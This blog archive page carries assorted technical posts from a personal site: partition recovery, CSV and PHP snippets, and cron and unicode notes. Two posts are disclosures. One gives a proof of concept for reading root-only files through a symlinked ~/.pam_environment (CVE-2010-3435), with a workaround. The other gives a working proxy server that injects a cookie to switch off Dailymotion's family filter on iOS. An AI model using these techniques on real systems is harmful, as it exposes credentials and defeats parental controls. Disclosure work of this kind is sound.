inside Habbie's mind

Mac GPT partition table recovery

written by peter, on Jan 2, 2012 6:18:00 AM.

UPDATE (Jan 12th 2012): see end of post for a much quicker restore method.

For reasons yet unknown, my Mac system disk lost its partition table (GPT) yesterday. This is how I recovered:

Finding

I booted an old copy of my OS X Install from USB and downloaded testdisk. I then used it to scan for any partitions it would recognise. Results (warning: copied by hand from photo):

Disk /dev/disk0 - 512 GB / 476 GiB - CHS 1000215216 1 1
     Partition        Start        End    Size in sectors
 P DOS_FAT_32            40     409639     409600 [EFI]
 P HFS            998945640 1000215175    1269536

The DOS_FAT_32 partition contains EFI data; the HFS partition contains OS X Lion Recovery data. Obviously, testdisk did not recognise my FileVault partition. However, it is quite likely our data partition is right in between these two!

Fixing

As testdisk does not support writing Mac/GPT partition tables, I took a phone camera photo of the results above and booted into the gparted liveCD (easier than building or finding parted/gdisk binaries for OS X, I think). With both my troubled drive and my old install connected on USB, it should be easy to compare details and get everything right.

As it turns out, gparted (the GNOME GUI for parted) is extremely limited. I could not even find how to define sector boundaries for partitions, and the partition type list is quite short. The CLI version is slightly better – it allows sector specifications but is unaware of most Apple-related GPT GUIDs.

This is how I, inefficiently, set my partition table straight:

  1. Use gparted to make a new GPT table.
  2. Use parted to make 3 partitions, using the numbers from testdisk and squeezing partition 2 right in between (starting one sector after end of partition 1, ending one sector before start of partition 3). I verified the snug fit with my old install.
  3. Try to set types and names right using parted, and failing.
  4. Trying the same thing with gdisk (which is on the gparted live CD) and succeeding. See below for correct settings.
After this (I actually tried to boot after step 3, did not work), my OS X is booting without trouble again. Pfew.

If you’re doing this, I recommend going with gdisk straight away.

Partition map

This is how the partition map looked on my old drive, how it looks now (after this recovery) on my current drive, and how I believe the partition map on most OS X installs (at least, when using Lion with FileVault) should look:
  1. sector 40-409639 (409600 sectors, 200.0 MiB): partition type EFI, label ‘EFI System Partition’
  2. sector 409640-? (? sectors, ? GiB): partition type Apple Core Storage, label whatever
  3. sector ?-? (1269536 sectors, 619.9 MiB): partition type Apple boot, label ‘Recovery HD’
In my case, the disk extended slightly beyond the end of partition 3. For best results, use testdisk to find the question marks for partition 3. I believe both partitions 1 and 3 should be marked bootable.

For non-FileVault users, I expect the type of partition 2 is HFS+ and the label does matter (cosmetically).

Wikipedia has a very useful list of partition type GUIDs. gdisk knows about all these numbers, though.

Update, Jan 12th 2012: it happened again. This time, I went straight for gdisk instead of bothering with (g)parted. gdisk immediately offered to restore my ‘backup MBR’ but did mention something about a broken checksum. I said ‘yes’, pushed ‘w’ for write. All done.

importing toggl.com Time Entries CSV in iWork Numbers

written by peter, on Oct 22, 2011 7:53:00 PM.

When trying to put a time report together for a client, to attach to an invoice, I figured getting a CSV from toggl would be a good start. As it turns out, their CSV is not entirely suitable for importing in Numbers.

This script fixes the CSV up in a few ways:

  • it puts a single quote character in front of all timestamp fields - without it, Numbers will interpret the dates and, for me, it is confused about day field vs. month field
  • it sorts the CSV by start time, ascending instead of descending

Code: (download here)

#!/usr/bin/env python
import csv
import sys
import operator

r = csv.reader(sys.stdin)
rows=[]
for row in r:
        row[5] = "'%s" % row[5]
        row[6] = "'%s" % row[6]
        row[7] = "'%s" % row[7]
        rows.append(row)

rows = [rows[0]] + sorted(
       rows[1:],
       key=operator.itemgetter(5)
)

w = csv.writer(sys.stdout)
for row in rows:
        w.writerow(row)
The script may be useful for Excel users too, I have not checked.

it's shit like this, PHP

written by peter, on Aug 20, 2011 7:47:00 AM.

This post has two snippets of code that demonstrate some aspects of the braindeadness that appears to be inherent in PHP arrays. I suggest trying to predict the output (especially with exhibit A) before you run the scripts, for extra fun ;) Exhibit A:
<?php
        // create empty array $a
	$a = array();
        // append two items to it
	$a[] = "a";
	$a[] = "b";
        // remove last item using array_pop
	array_pop($a);
        // append another item
	$a[] = "c";

	$b = array();
	$b[] = "a";
	$b[] = "b";
        // remove last item using unset
	unset($b[1]);
	$b[] = "c";
        // print key for value "c"
	print array_search("c", $a). "\n";
	print array_search("c", $b). "\n";
?>
This behaviour does not clearly follow from the docs.

Exhibit B:

<?php
        // create pre-filled key-less array $a
	$a=array('a','b');
        // dump it
	print_r($a);
        // json-dump it
	print json_encode($a)."\n";
        // add key/value item to array
	$a['x']='c';
	print_r($a);
	print json_encode($a)."\n";
?>
This behaviour is described in examples in the docs. It demonstrates how braindead the PHP array type is.

(I’m on PHP 5.3.4).

twitter clients, redux

written by peter, on Jul 4, 2011 8:38:00 AM.

With the demise of Nambu into no-DM-territory, I am looking for a new Mac OS X Twitter client again. This time, no reviews, just short (rejection) notes.

from symlinks to private keys

written by peter, on May 30, 2011 3:41:00 PM.

In my previous blog post I wondered

I don’t know what the mathematical implications of having the last few bits of a private key are, but it can’t be good.

As it turns out, for DSA, quite bad.

In short, this pam_env symlink issue, in some cases, allows an attacker to lift enough private key data from a DSA key to make brute-forcing the rest feasible.

For all details, see my article. Comments welcome on this post, or via e-mail as noted in the article.

on CVE-2010-3435

written by peter, on May 12, 2011 9:23:00 PM.

When logging in, Ubuntu shows (admin?) users some useful information, such as
70 packages can be updated.
35 updates are security updates.
I recently ran into an issue where this information popped up twice on each login – one up-to-date entry and one outdated entry. Some investigation showed that somehow /etc/motd.tail had gained these lines too. The fix (rm -f /etc/motd.tail) was simple enough.

However, in the course of this investigation I noticed that /etc/update-motd.d is basically a bunch of shell scripts that get run as root on every ssh login by any user. Scary, no?

Remembering that being able to inject some environment variables was always a great way to break out of ‘restricted’ shells that were written in (ba)sh, I set out to look at methods of influencing the environment these scripts would be run in. .ssh/environment, .pam_environment and OpenSSH’s SendEnv all turned out to be smart enough to only do their work after update-motd was done, sadly. I was out of ideas.

The code of pam_env.so did tell me another interesting thing – ~/.pam_environment is opened and read as root, without any dropping of privileges. This suggested that symlinking it to some unreadable file (of the right format, i.e. consisting of VAR=value lines) would compromise the data in that file.

A proof of concept was simple enough (newline inserted because my blog layout is too narrow):

root@vps6001:~# cat /etc/env2
ENV2=bla
...
peter@vps6001:~$ ls -al .pam_environment 
lrwxrwxrwx 1 peter peter 9 May 12 22:13
                   .pam_environment -> /etc/env2
peter@vps6001:~$ ls -al /etc/env2
---------- 1 root root 9 May 12 22:13 /etc/env2
peter@vps6001:~$ set | grep -i env
ENV2=bla
It works! This means that any file that has lines containing = (without whitespace around it) would be fair game. My first thought was /etc/mysql/debian.cnf, but that one has whitespace around the = characters.

Effective targets for this trick do exist. DirectAdmin (a commercial control panel) stores MySQL login information in a suitable file, and many daemons that support LDAP expect a password stored in a similar way. Also, base64-encoded files (like SSL and ssh keys) that happen to need padding such that they end in == expose their last line this way. I don’t know what the mathematical implications of having the last few bits of a private key are, but it can’t be good.

Some internet searching turned out that this issue was previously discovered by other people.

Ubuntu 10.04 and Debian 6 are still vulnerable to this issue. Debian has a report on file but has not acted on it yet. Ubuntu doesn’t seem to know at all.

I emailed security@ for both distributions, Debian responded within minutes pointing me to the report they already had. I’m waiting for a response from Ubuntu.

Workaround: add user_readenv=0 to every pam_env.so listing in /etc/pam.d.

dreaming wikipedia

written by peter, on Feb 23, 2011 6:49:07 AM.

Last night, I dreamt that this Wikipedia-article existed, with these lines in it.

Load average


Originally defined as the difference between available system memory and free memory.

Load average can also be calculated for car engines; a common value is 2.2.

I swear I’m not making this up ;)

disabling the family filter on Dailymotion for iPhone/iPad

written by peter, on Jan 31, 2011 6:07:00 AM.

The Dailymotion REST APIs currently honour the family_filter cookie that their user-facing website uses to manage filter settings. This makes the API, effectively, not RESTful because there is state involved.

The bigger implication however, is that injecting one cookie (family_filter=off) into your iPhone/iPad-application will fully disable the family filter for that client. This would be, I suspect, a violation of Apple App Store guidelines. Of course, if people do this for their own devices, nobody cares. However, this issue would allow a competent malicious third party (or a dedicated teenager ;)) to silently enable the viewing of adult material on a device that is expected to be family-safe.

Note that jailbreaking or similar hacks are not needed to exploit this issue. Hijacking traffic at the network level, or simply pointing the iPhone/iPad’s proxy configuration to a specifically prepared server, is enough.

(On a sidenote, the iPad/iPhone app uses an older REST API that does not conform to the current API docs and also does not use HTTPS, making this issue slightly easier to exploit).

Simple working example of such a specifically prepared server:

from twisted.web import server, resource
from twisted.internet import reactor

from twisted.python import log
import sys
log.startLogging(sys.stdout)

class Simple(resource.Resource):
    isLeaf = True
    def render_GET(self, request):
        request.addCookie(
            "family_filter",
            "off",
            path="/",
            expires="Tue, 24-Jan-2012 22:26:22 GMT"
        )
        return "{}"

site = server.Site(Simple())
reactor.listenTCP(8080, site)
reactor.run()

I doubt Dailymotion is the first or only iOS app that can be influenced by getting some cookies in. Will we see more of this?

cron considered harmful

written by peter, on Jun 22, 2010 7:19:00 AM.

On numerous occasions I have lamented both the design and the typical usage of cron to friends and other geeks. My main gripes:
  • jobs are not protected against running concurrently (design issue)
  • intervals are fixed (design issue)
  • people tend to schedule the same job at the same time on whole clusters of machines (typical usage issue)
The first issue can be fixed with tools like lockfile and setlock — a lot of red tape for something that should be a default feature.

The second and third issue are closely related in that both cause undesirable load spikes because many things happen at the same time, either because of intervals phasing up or because of similar jobs running on a bunch of machines at the same time, perhaps hammering the network.

A specific pet peeve is Mailman Reminder Day. Firstly, I just don’t see the point; if my address is on a mailing list and that list is practically dead, I just don’t care. Secondly, it means every first of the month I have tens of reminders that I just delete. Some of these lists are busy — for those, the reminder is a minor nuisance. But many lists are extremely quiet (think software release announcements) and for some of these lists, the reminders are over 50% of the total mail volume. It’s so wasteful. Also, I can’t help but think that all those reminders being sent out at the same time (well, divided over 24 hours because of time zone differences) cannot be good for the mail ecosystem as a whole.

For issues two and three, Colm MacCárthaigh wrote a few great posts detailing why cron is bad, and showcasing one potential solution to the issues at hand. I suggest reading these posts fully, they are very insightful:

This post was inspired by my pet peeve about Mailman and about jobs running in parallel unintendedly; this post was triggered by Job Snijders pointing me to another interesting post; Colm’s posts above were referred to in the comments.

silly Python unicode mistake

written by peter, on Jun 12, 2010 7:58:00 AM.

For a simple blog-to-twitter posting gateway (source code) I’m relying on the excellent feedparser and twitter modules, and I am trusting them to handle unicode strings without trouble. With most well-written Python modules (and these two are no exception!) methods will return unicode strings as they see fit, and other methods will accept these unicode strings and handle all the nitty gritty encoding details for me.

A simplified version of my workflow would look like this:

def post(entry):
  title = entry.title
  print "posting [%s]" % title
  api.PostUpdate(title) # api is a twitter Api object

feed = feedparser.parse(config["feed"])
for e in reversed(feed.entries):
  if not e.id in seen:
    post(e)
This code bombed out with an exception on the first post that had a non-ASCII title. Can you spot why?

It’s the print statement. All the APIs I’m using have zero trouble with unicode, but print wants to encode for your terminal and it’ll usually assume that that is ASCII. My ‘debugging’ output actually broke the program. My workaround is to say title.encode("ascii","replace")

Brend on #python pointed out to me that the issue is not, exactly, print. The issue is interpolating title into a non-unicode string. Depending on environment, using print on the unicode object might in fact work. For those environments, saying print u"posting [%s]" % title could help. In my case however, I ran into the issue from cron with no locale set at all, so dumbing the string down to ascii is still the right thing to do.